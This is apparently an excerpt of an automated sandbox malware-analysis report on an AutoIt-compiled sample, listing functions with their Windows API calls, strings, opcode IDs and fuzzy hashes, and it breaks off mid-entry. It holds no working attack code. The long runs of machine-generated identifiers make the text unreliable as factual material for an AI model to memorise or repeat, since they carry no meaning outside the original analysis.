                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: LoadString$_wcslen
                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 4099089115-3080491070
                                        • Opcode ID: 996c11eaad80b3c468644184c527031ac3afc0ad9e1406a27716e22c81fbbb30
                                        • Instruction ID: 82c3f54f7e777d2d88703d8ab93d01de200a616eb97f159c301840522e2e9375
                                        • Opcode Fuzzy Hash: 996c11eaad80b3c468644184c527031ac3afc0ad9e1406a27716e22c81fbbb30
                                        • Instruction Fuzzy Hash: D5518D72D00609BADF15EBA0CD46EEEB7B8AF14340F108165F509731A2EB352F98DB65
                                        Function 000DB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharUpper
                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                        • API String ID: 1256254125-769500911
                                        • Opcode ID: 47602f5617b5b1ad23a9103170b2b2f2e4a0a5a86b746b803424c72a2d5441ae
                                        • Instruction ID: 13a00ab7aa8bb70fb4962130521ab9649155355e5e4c2607f3f48e4425568ede
                                        • Opcode Fuzzy Hash: 47602f5617b5b1ad23a9103170b2b2f2e4a0a5a86b746b803424c72a2d5441ae
                                        • Instruction Fuzzy Hash: 8941E832A00226DBCB605F7D89905BE77E5AF61754B26412BE421D7384E739CD81C7A0
                                        Function 000E5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 000E53A0
                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 000E5416
                                        • GetLastError.KERNEL32 ref: 000E5420
                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 000E54A7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Error$Mode$DiskFreeLastSpace
                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                        • API String ID: 4194297153-14809454
                                        • Opcode ID: 07219b3399a57766b2ff998c3b25ef021183bf8797cf8e7f544055ddad0593f5
                                        • Instruction ID: 94263ec076185c106757acf6f84be2c492ebe59c95c56234172f6c5b9f6898d8
                                        • Opcode Fuzzy Hash: 07219b3399a57766b2ff998c3b25ef021183bf8797cf8e7f544055ddad0593f5
                                        • Instruction Fuzzy Hash: AD31D0B5A006449FC750DF69C884AAABBF4EF4530EF14C465E405EB2A2DBB0DD86CB90
                                        Function 00103C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateMenu.USER32 ref: 00103C79
                                        • SetMenu.USER32(?,00000000), ref: 00103C88
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00103D10
                                        • IsMenu.USER32(?), ref: 00103D24
                                        • CreatePopupMenu.USER32 ref: 00103D2E
                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00103D5B
                                        • DrawMenuBar.USER32 ref: 00103D63
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                        • String ID: 0$F
                                        • API String ID: 161812096-3044882817
                                        • Opcode ID: a52f89b95ecb3b68aab9972d2817dfc598f1d3fdf31b90e77e580e2c961439e7
                                        • Instruction ID: 0f7097e3b1f26bee1f12ab438ab030d888764a2d853bc217d976634328936071
                                        • Opcode Fuzzy Hash: a52f89b95ecb3b68aab9972d2817dfc598f1d3fdf31b90e77e580e2c961439e7
                                        • Instruction Fuzzy Hash: 22419C79A01209EFDB14CFA4D844AEA7BB9FF49310F140129F996973A0D7B0AA50DF90
                                        Function 00103A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00103A9D
                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00103AA0
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00103AC7
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00103AEA
                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00103B62
                                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00103BAC
                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00103BC7
                                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00103BE2
                                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00103BF6
                                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00103C13
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$LongWindow
                                        • String ID:
                                        • API String ID: 312131281-0
                                        • Opcode ID: b27b0e8e980553955a85eaec0c79f5a27845da92c9d4f500aebebb2afc5c1795
                                        • Instruction ID: 1832a4e87a3da6d2b604371fd5281670b1894f0f035553bd986854009a990cce
                                        • Opcode Fuzzy Hash: b27b0e8e980553955a85eaec0c79f5a27845da92c9d4f500aebebb2afc5c1795
                                        • Instruction Fuzzy Hash: BC617D75900248AFDB10DF68CD81EEE77B8EB49704F10419AFA55E72E1D7B0AE81DB50
                                        Function 000DB12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 000DB151
                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,000DA1E1,?,00000001), ref: 000DB165
                                        • GetWindowThreadProcessId.USER32(00000000), ref: 000DB16C
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,000DA1E1,?,00000001), ref: 000DB17B
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 000DB18D
                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,000DA1E1,?,00000001), ref: 000DB1A6
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,000DA1E1,?,00000001), ref: 000DB1B8
                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,000DA1E1,?,00000001), ref: 000DB1FD
                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,000DA1E1,?,00000001), ref: 000DB212
                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,000DA1E1,?,00000001), ref: 000DB21D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                        • String ID:
                                        • API String ID: 2156557900-0
                                        • Opcode ID: b48a77bd685aaa135fd567f7922ade5307f7564532fcd92b194fa448c0484150
                                        • Instruction ID: 117597dd4e83a9501215ac632151b5e3553fac2f11b58b30ae89285d4932a3c4
                                        • Opcode Fuzzy Hash: b48a77bd685aaa135fd567f7922ade5307f7564532fcd92b194fa448c0484150
                                        • Instruction Fuzzy Hash: 6E3180BA500304EFDB209F24EC84B7DBBB9BB56355F114206FA11D76A0D7B499808F74
                                        Function 000A2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 000A2C94
                                          • Part of subcall function 000A29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,000AD7D1,00000000,00000000,00000000,00000000,?,000AD7F8,00000000,00000007,00000000,?,000ADBF5,00000000), ref: 000A29DE
                                          • Part of subcall function 000A29C8: GetLastError.KERNEL32(00000000,?,000AD7D1,00000000,00000000,00000000,00000000,?,000AD7F8,00000000,00000007,00000000,?,000ADBF5,00000000,00000000), ref: 000A29F0
                                        • _free.LIBCMT ref: 000A2CA0
                                        • _free.LIBCMT ref: 000A2CAB
                                        • _free.LIBCMT ref: 000A2CB6
                                        • _free.LIBCMT ref: 000A2CC1
                                        • _free.LIBCMT ref: 000A2CCC
                                        • _free.LIBCMT ref: 000A2CD7
                                        • _free.LIBCMT ref: 000A2CE2
                                        • _free.LIBCMT ref: 000A2CED
                                        • _free.LIBCMT ref: 000A2CFB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 99dd78261ecf4c01a08df4808d016f0fb111c84ad77a0fb54f6d427c530a364e
                                        • Instruction ID: 675c861c624c3bab038a37295dee51ad6fcd45fbe4e0f717cca1c8a57790c3b6
                                        • Opcode Fuzzy Hash: 99dd78261ecf4c01a08df4808d016f0fb111c84ad77a0fb54f6d427c530a364e
                                        • Instruction Fuzzy Hash: 0811A476110108BFCB42EF98D982CDE3BA5FF06750F4144A5FA489F223DA31EE509BA1
                                        Function 00071410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00071459
                                        • OleUninitialize.OLE32(?,00000000), ref: 000714F8
                                        • UnregisterHotKey.USER32(?), ref: 000716DD
                                        • DestroyWindow.USER32(?), ref: 000B24B9
                                        • FreeLibrary.KERNEL32(?), ref: 000B251E
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 000B254B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                        • String ID: close all
                                        • API String ID: 469580280-3243417748
                                        • Opcode ID: b436cef70a97f3e14bebe9f1ce3e959163de31a0f938ba262887dbd33982d27a
                                        • Instruction ID: 3630ca647e02770aae2118c2413f71f26137c7f2e992ceb4d886cf19d956cc9d
                                        • Opcode Fuzzy Hash: b436cef70a97f3e14bebe9f1ce3e959163de31a0f938ba262887dbd33982d27a
                                        • Instruction Fuzzy Hash: FAD19231B01212CFCB29EF19C499AA9F7A4BF05700F14829DE54E6B292DB34ED52CF55
                                        Function 000E7DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000E7FAD
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000E7FC1
                                        • GetFileAttributesW.KERNEL32(?), ref: 000E7FEB
                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 000E8005
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000E8017
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000E8060
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 000E80B0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory$AttributesFile
                                        • String ID: *.*
                                        • API String ID: 769691225-438819550
                                        • Opcode ID: 6b2484b4d4f2b320754e995ae8592a2e2ae785dc9aa5c81203abfa8c9f4b6afe
                                        • Instruction ID: 68de0498442a8833a4c90a70e9f2255646faa59484f97ad882d5f1dd6f7c95b1
                                        • Opcode Fuzzy Hash: 6b2484b4d4f2b320754e995ae8592a2e2ae785dc9aa5c81203abfa8c9f4b6afe
                                        • Instruction Fuzzy Hash: 8D81B2715082819FCB64EF16C444AAEB3E8BF88310F54886EF88DE7251EB34DD45CB92
                                        Function 00075BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowLongW.USER32(?,000000EB), ref: 00075C7A
                                          • Part of subcall function 00075D0A: GetClientRect.USER32(?,?), ref: 00075D30
                                          • Part of subcall function 00075D0A: GetWindowRect.USER32(?,?), ref: 00075D71
                                          • Part of subcall function 00075D0A: ScreenToClient.USER32(?,?), ref: 00075D99
                                        • GetDC.USER32 ref: 000B46F5
                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 000B4708
                                        • SelectObject.GDI32(00000000,00000000), ref: 000B4716
                                        • SelectObject.GDI32(00000000,00000000), ref: 000B472B
                                        • ReleaseDC.USER32(?,00000000), ref: 000B4733
                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 000B47C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                        • String ID: U
                                        • API String ID: 4009187628-3372436214
                                        • Opcode ID: 72d7f15796cafa10a49de58c1a551b2162761818e6dd4e4ae2b329435c074b3e
                                        • Instruction ID: 77001415b9ecde0d344fbeb0ba2a77abba426dab35c7c763423e5c1344d94463
                                        • Opcode Fuzzy Hash: 72d7f15796cafa10a49de58c1a551b2162761818e6dd4e4ae2b329435c074b3e
                                        • Instruction Fuzzy Hash: 4171DD34804205EFCF218F64C984AEE3BF5FF4A311F148269E9555A2A7CB718A81DF60
                                        Function 000E359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 000E35E4
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                        • LoadStringW.USER32(00142390,?,00000FFF,?), ref: 000E360A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: LoadString$_wcslen
                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 4099089115-2391861430
                                        • Opcode ID: c282d3ce64e35ffe779664795cf2527632f2b9c1a8767d77c2fe44ffcbff2f80
                                        • Instruction ID: 05a226dd2a071a6f235b708ba41439305fbeb9e913dd507d7f1ff1f6f1372cee
                                        • Opcode Fuzzy Hash: c282d3ce64e35ffe779664795cf2527632f2b9c1a8767d77c2fe44ffcbff2f80
                                        • Instruction Fuzzy Hash: 02517F71C00249BBDF25EBA0CC46EEEBB78AF15310F148125F509721A2EB351B98DFA5
                                        Function 000EC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000EC272
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000EC29A
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 000EC2CA
                                        • GetLastError.KERNEL32 ref: 000EC322
                                        • SetEvent.KERNEL32(?), ref: 000EC336
                                        • InternetCloseHandle.WININET(00000000), ref: 000EC341
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                        • String ID:
                                        • API String ID: 3113390036-3916222277
                                        • Opcode ID: 4fa6d2422b7009f8f1a0e98633c8b5bc8072826df37708552f1eba3e43e9ffa6
                                        • Instruction ID: 3184b3b4fc222f0dfdde81cba94962b832647f6b8299101f3511f24e76c859ed
                                        • Opcode Fuzzy Hash: 4fa6d2422b7009f8f1a0e98633c8b5bc8072826df37708552f1eba3e43e9ffa6
                                        • Instruction Fuzzy Hash: 34319371500284AFE7219F668C84EAB7BFCEB45740B14851DF486A2601D771DD469BA0
                                        Function 000D989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,000B3AAF,?,?,Bad directive syntax error,0010CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 000D98BC
                                        • LoadStringW.USER32(00000000,?,000B3AAF,?), ref: 000D98C3
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 000D9987
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: HandleLoadMessageModuleString_wcslen
                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                        • API String ID: 858772685-4153970271
                                        • Opcode ID: 6a2ce20f8126a9d3ce2064fb615e22851a4067504a7ce020723361f4989962c5
                                        • Instruction ID: 81c8e957eb674f745acf20825df8eb7ba779f11e3f88993ff6e06a4c3093626a
                                        • Opcode Fuzzy Hash: 6a2ce20f8126a9d3ce2064fb615e22851a4067504a7ce020723361f4989962c5
                                        • Instruction Fuzzy Hash: 75216D31D0021AFBDF25AF90CC16EEE7779FF18300F04846AF519660A2EB759658DB61
                                        Function 000D209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetParent.USER32 ref: 000D20AB
                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 000D20C0
                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 000D214D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameParentSend
                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                        • API String ID: 1290815626-3381328864
                                        • Opcode ID: 75d329d28d016dd63dc5c767fe6538ffcb1e5c13e0240316d23500e211725185
                                        • Instruction ID: 0daf97d0dc4f755a0d37b2ffb6565369493396536ac6b26be3ee063b776b7d81
                                        • Opcode Fuzzy Hash: 75d329d28d016dd63dc5c767fe6538ffcb1e5c13e0240316d23500e211725185
                                        • Instruction Fuzzy Hash: 8411067A688706B9FB212220DC07DEA779DCF35724F204217FB04A52D6EFA168426A64
                                        Function 000ACE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                        • String ID:
                                        • API String ID: 1282221369-0
                                        • Opcode ID: 4f91c54b7661c32a3c93e813a46f9cade62f40640e245cdac9048730fa9102ab
                                        • Instruction ID: 1641fa9068baa39bde0a845d599740c0d81c0a7c7acc0acd7c43a503894ceb34
                                        • Opcode Fuzzy Hash: 4f91c54b7661c32a3c93e813a46f9cade62f40640e245cdac9048730fa9102ab
                                        • Instruction Fuzzy Hash: 87614672904301AFEF61AFF89881FAE7BE5AF07320F05427EFA5597292D6319D418790
                                        Function 001050D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00105186
                                        • ShowWindow.USER32(?,00000000), ref: 001051C7
                                        • ShowWindow.USER32(?,00000005,?,00000000), ref: 001051CD
                                        • SetFocus.USER32(?,?,00000005,?,00000000), ref: 001051D1
